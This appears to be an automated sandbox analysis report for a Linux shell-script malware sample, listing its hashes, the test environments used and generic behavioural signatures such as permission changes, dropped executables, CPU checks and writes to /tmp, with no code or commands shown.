Analysis
-
max time kernel
48s -
max time network
49s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
18/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
-
Size
10KB
-
MD5
88b0cb0deae34d27e127ac1963f30b4c
-
SHA1
aa90edbaf4aa756d35f9ad1d9e7795753a246d8a
-
SHA256
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7
-
SHA512
30c23dec6dc20ae881a3380dd92abe992744a2f1f881894a2b9eeb52522bc10978c510da71c189ad7399f67e553202f9b7a879d26736d988087bfb405e366435
-
SSDEEP
192:WieD4AJAbH92514rzsmOAznuFtE/514rzADznuFtocieD4AOd:WieD4AJAbH9WmOkqieD4AOd
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information, which indicates whether the system is a virtual machine.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97